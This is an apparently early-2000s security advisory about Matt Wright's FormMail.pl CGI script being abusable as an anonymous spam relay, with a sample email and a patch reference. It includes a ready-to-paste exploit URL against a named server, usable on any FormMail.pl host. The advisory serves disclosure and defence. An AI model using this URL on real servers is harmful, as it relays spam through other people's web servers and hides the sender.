COMMAND

    FormMail.pl

SYSTEMS AFFECTED

    FormMail

PROBLEM

    Michael  Rawls  found  following.   He  did  a little playing with
    FormMail.pl after a run in  with a spammer abusing our  webserver.
    Apparently ALL  FormMail.pl cgi-bin  scripts can  be used  to spam
    anonymously.  He found  another server with FormMail.pl  and tried
    the same exploit to send myself an email and it worked.

    The email  will not  show the  spammer's real  IP.   Only the  web
    servers IP will show.  The  web server logs will however show  the
    true IP address of the spammer.

    Actual example of email sent:

        Return-Path: <apache@hum.auc.dk>
        Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
	        by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
	        for <spam-l@shadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
        Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
	        id 14bta3-0004tP-00
	        for spam-l@shadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
        To: spam-l@shadowstorm.com
        From: ()
        Subject: WWW Form Submission
        Message-Id: <E14bta3-0004tP-00@hercules.humfak.auc.dk>
        Date: Sun, 11 Mar 2001 01:19:27 +0100
        X-UIDL: TPj"!bg3"!i:T!!=FU"!

        Below is the result of your feedback form.  It was submitted by
        () on Sunday, March 11, 2001 at 01:19:27
        ---------------------------------------------------------------------------

        message: Proof that FormMail.pl can be used to send anonymous spam.

        ---------------------------------------------------------------------------

    Paste the line below  in to your web  browser URL box as  one long
    single  line,   insert  your   email  in   address  in   place  of
    "email@address-to-spam.com", and press enter.   Now go check  your
    email:

        http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam

    The address "www.hum.auc.dk" can  be replaced with the  address of
    ANY webserver set up to use FormMail.pl

SOLUTION

    Patched version of the Matt Wright's Formmail.pl is now available.
    Parameshwar  Babu  has  released  a  patched  version of formmmail
    script that contains  a fix to  this security hole  in the script.
    The modified script  allows you to  specify the list  of recipient
    email addresses in a  text  file. Thus  the script can be  used to
    restrict emails  so that  they would  be sent  only to  authorized
    addresses.  A patched version of the script can be downloaded from

        http://www.mailvalley.com/formmail/